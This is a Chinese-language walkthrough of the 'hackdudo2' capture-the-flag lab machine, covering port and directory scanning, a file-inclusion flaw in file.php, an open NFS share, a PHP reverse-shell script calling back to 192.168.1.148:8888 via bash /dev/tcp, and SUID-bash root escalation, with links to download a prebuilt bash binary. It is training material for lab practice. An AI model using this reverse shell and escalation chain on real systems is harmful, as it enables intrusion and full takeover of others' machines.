hackdudo2解题过程

一、信息收集

1.主机ip确认

arp-scan -l

2.端口扫描

nmap -T4 -sV -p- -A 192.168.1.227

 这里留意一下2049端口开启的nfs服务,后续有用。

 3.目录扫描

gobuster dir -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u

 这里发现file.php文件

 访问发现他说这里存在文件访问(file access)

 

 4.参数爆破

wfuzz --hw 14 -w /usr/share/wordlists/wfuzz/general/common.txt -u http://192.168.1.227/file.php?FUZZ=../../../etc/passwd

 这里爆破出参数file

 二、漏洞发现和利用

1.访问http://192.168.1.227/file.php?file=/etc/passwd,可以发现web端存在文件包含漏洞

2.挂载nfs服务

NFS,全称Network File System,即网络文件系统。最大的功能是通过网络,让不同的机器、不同的操作系统可以共享彼此的文件。可以理解为本地多了一个虚拟磁盘。nfs服务的缺点之一是客户端没有用户认证机制。

showmount -e 192.168.1.227

 发现靶机将/mnt/nfs目录挂出来了,并且给了所有权限  *

创建目录并挂载

mkdir /mnt/nfs

mount -t nfs 192.168.1.227:/mnt/nfs /mnt/nfs

找到第一个flag

3.利用nfs进行文件上传,实现反弹shell

写一个php的脚本,并进行端口监听。然后利用web端的文件包含漏洞进行访问执行

 php脚本

<?php
// 定义目标 IP 和端口
$ip = '192.168.1.148';  // 替换为你的监听机器 IP
$port = 8888;           // 替换为你的监听端口

// 构造 Bash 反弹 Shell 命令
$command = "bash -c 'bash -i >& /dev/tcp/{$ip}/{$port} 0>&1'";

// 执行命令
shell_exec($command);
?>

 

三、提权

1.利用nfs提权漏洞进行提权,命令:cp /bin/bash . 、chmod u+s bash,chmod +x bash然后在靶机中通过./bash -p来实现提权至root,我这里是因为kali的bash太高,导致提权失败。 

 我的kali的bash版本比靶机高,所以靶机运行不了

 

 

2.如果你也有我的那种问题,可以去找一个低版本的虚拟机,然后把低版本的bash文件拷出来再进行上传。

提权后可以在root目录下找到root.txt文件,那就是最后的flag。

  

3.如果你的bash版本也高,又懒得去别的虚拟机找低版本的bash文件,那直接下载我的也行。

 (我也因为这个文件卡了挺久!!!!看别人文章都不给现成文件受不鸟!)

链接: https://pan.baidu.com/s/1qcyAuwTUmNrmgUSq3Pol7Q?pwd=yucn 提取码: yucn


链接:https://pan.quark.cn/s/64053f4d0ce3

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值